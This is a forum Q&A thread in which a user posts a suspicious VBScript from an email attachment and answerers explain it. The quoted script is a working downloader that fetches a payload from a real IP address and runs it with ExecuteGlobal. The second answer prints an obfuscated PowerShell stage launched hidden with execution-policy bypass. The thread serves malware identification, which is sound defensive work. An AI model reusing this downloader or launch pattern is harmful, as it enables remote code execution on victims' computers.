Received Script that is a possible virus. What does it do?

Question

I received an email containing a Visual Basic (.vbs) script on it. Opened in a safe environment and found this. What does it do?

      Dim strname, strlength

strname = "This function is to reverse the tring without using strreverse"

strlength = len(strname)

For i = strlength to 1 step-1

ch = mid(strname,i,1)

cha = cha&ch
Next

Set filatelismo = CreateObject("WinHttp.WinHttpRequest.5.1")
arvicultura = Strreverse("txt.cD02/222:15.18.24.5//:ptth")
filatelismo.Open "GET",arvicultura, False
filatelismo.Send
olente = filatelismo.ResponseText
anoneira olente
Function anoneira(mural)
ExecuteGlobal mural
End Function

Answer 1

It downloads a payload from a site and then executes the commands in that payload, so this is just the downloader.

It has the URL of the payload as a reversed string, hence the function Strreverse to reverse a string.

The function anoneira is what it uses to execute the downloaded payload.

Answer 2

The script is designed to deliver a payload from a remote address and execute its contents.

Here is a breakdown of what it does.

Downloads a text payload from http://5.42.81.51:222/20Dc.txt after some rudimentary attempts to obfuscate it (using a reversed string).

The downloaded payload contains a VBScript that is executed using the ExecuteGlobal command.

Here is the payload that is executed via VBScript using the WScript.Shell Run() method.

eGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGMDgTrecDgTreBvDgTreEYDgTreQQBiDgTreG8DgTreLwBzDgTreGUDgTrebDgTreBpDgTreGYDgTreLwBvDgTreHIDgTrecDgTreDgTreuDgTreGQDgTrebDgTreBlDgTreGkDgTreaDgTreBzDgTreG8DgTrebgBhDgTreG4DgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreLDgTreDgTregDgTreCcDgTreMDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreFQDgTrecgBlDgTreHYDgTreJwDgTrepDgTreCkDgTrefQB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

The first part is a Base64 encoded string that is manipulated (certain character sequences are replaced DgTre becomes A) before decoding the base64 using Powershell.

The manipulated / decoded Base64 string is then executed using Powershell

powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD

Safe to say this is a malicious script and should not be run. For more details about the specific attack vectors, see this Analysis Report.